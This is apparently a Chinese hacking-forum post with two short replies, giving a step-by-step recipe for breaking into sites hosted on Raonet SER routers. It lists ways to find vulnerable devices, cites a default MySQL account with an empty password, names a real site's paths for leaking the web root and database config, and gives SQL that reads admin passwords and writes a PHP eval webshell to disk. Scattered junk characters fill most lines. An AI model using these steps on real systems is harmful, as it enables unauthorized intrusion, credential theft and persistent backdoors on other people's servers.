找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2803|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
  寻找存在漏洞的路由器方法:. \) N' P0 _+ b) ?5 C5 h/ p

4 T6 J' J7 g" h) n1:google搜索'Raonet Subscriber Ethernet Router'
/ O& x7 K- Q' Y
) q8 Q# q* Z% x% R) Q9 [2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
' N) ~2 {; T+ q5 d% Y& ^& T! m
. X7 c- f7 G+ }1 ^! B. K3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
6 N7 e- o2 A; T* q/ f4 M3 i! ], I# V9 {9 s+ t+ J( ]/ {. c9 M
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......5 p3 \& d) n1 q& \" S" K4 A
3 a5 ~& f' o; g% S
& \0 @% p2 y1 i/ [$ ~
# ?6 F/ U( h+ l, J  X
入侵步骤:: \3 z) Q) X% R; M6 L9 K, p  H

: |0 G, _  \  {4 M; r1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php4 c1 R8 p( ^5 Y, X5 A* T3 X

+ t/ D. J1 j' m2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
: a+ c& r8 `: x: z3:得到密码后连接,查看GUI管理密码:
4 S% d. o2 q3 Q$ Y/ buse ser_500- e, d; C' ~. ?- e" P6 n
select id,passwd from user;+ L" \* E. I, n0 u. k) S
4:通过数据库写入webshell,执行命令:
- G1 H% r2 w% Q7 }# L3 U6 T5 quse mysql;9 y* f! B, _; z9 h! A$ {& C
create table ok(cmd TEXT);
% D) N0 I8 f; x: F7 ~insert into ok values("<?php @eval($_POST[cmd])?>");0 y/ Q& O- }" W' N% p! u
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";- s% E5 |$ v6 U1 D9 }0 g
drop table ok;' h, k& z1 t# b1 _/ M2 `

' e( O4 s0 M2 _; W, a$ P5:连接后门shell.php " s) Q1 l0 x9 o/ X/ h

% H1 P: ~# R- x6. 搞定!8 n6 _" T) z: B: Z- G7 i
5 [% d2 F! F. q; G
回复

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表